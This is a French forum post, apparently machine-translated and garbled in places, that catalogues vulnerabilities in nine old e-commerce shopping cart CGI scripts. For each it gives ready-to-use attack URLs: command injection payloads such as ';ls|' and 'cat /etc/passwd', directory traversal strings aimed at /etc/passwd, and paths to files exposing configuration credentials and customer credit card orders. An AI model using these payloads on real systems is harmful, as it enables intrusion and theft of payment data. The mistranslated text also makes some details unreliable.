Nous poursuivons notre étude des bugs dans le passé récent, des chariots populaires.
Cette fois , nous allons examiner au début de camions qui sont autorisés à exécuter des commandes arbitraires, et après, et autres goodies.
Nombre 1er nous allons (e) Boutique en ligne Shop Système de Webdiscount.net
le script ne filtre pas les caractères convoyeur (;) et peyapa (|):
www.xxx.com/cgi-bin/eshop.pl seite =; ls |?
Numéro 2 Shoping de panier de Hassan Consulting [shop.cgi] par Hassan Consulting.
la même chose:
www.xxx.com/cgi-local/shop.pl/page= | ls |
www.xxx.com/cgi-local/shop.pl/page=; ls |
malheureusement , dans les versions 4 et au- dessus de panier Shoping Hassan Conseil ce bug est déjà pas disponible, mais il y a un autre problème avec la demande www.xxx.com/cgi-local/shop.pl~~MD~~aux peut savoir quelle version d'un panier et un moyen de script.
Numéro 3 ShopPlus Panier
de même, l'absence de contrôle sur les caractères d'entrée:
www.xxx.com/scripts/shopplus.cgi dn = domainname.com & CartId =% CartId% & file =; uid |? www.xxx.com/scripts/shopplus.cgi dn = domainname.com & CartId =% CartId% & file =; cat% 20 / etc / passwd |?
Numéro 4 multi-boutique 1,06
Au lieu de fichier de modèle, vous pouvez spécifier une commande.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf & user_notebooks = note_envoy
Numéro 5 WebCart par Mountain Network Systems
exécuter des commandes à distance:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD
En outre, d' autres vulnérabilités sont levés
Numéro 6 Dansie Panier 3,04 Vulnérabilités multiples
Ajoutant à la fin de certaines variables et valeurs à http: //target/cgi-bin/cart.pl?
Il permet aux utilisateurs distants d'effectuer certaines actions.
paramètres d'affichage "Vars"
l' application des paramètres de configuration, qui inclut le nom d' utilisateur et mot de passe utilisé
pour les transactions par carte de crédit.
Les paramètres d'environnement peuvent être obtenus
en utilisant le "env".
La chaîne "db" liste le fichier de base de données complète qui contient tous les éléments dans le panier.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db
Numéro 7 ShopCartCGI v 2.3
la faille permet à un utilisateur distant pour afficher les fichiers sur le serveur:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../ .. /../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../. ./../../../../etc/passwd
Numéro 8 QuikStore Panier
Un utilisateur distant peut afficher les fichiers sur le système:
www.xxx.com/quikstore.cgi?blah&template=../../.
./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/ hôtes
www.xxx.com/quikstore.cgi?blah&t emplate = .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / usr / bin / id |
Number 9 DCShop électronique Panier
Beaucoup de bugs:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - des informations sur la carte de crédit dans les anciennes versions du chariot a été vu depuis.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - les vieux problèmes de crédit dans certaines versions.
Votre bug Durito.
_________________
MANGER LES RICHES!
|
Commentaires
Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.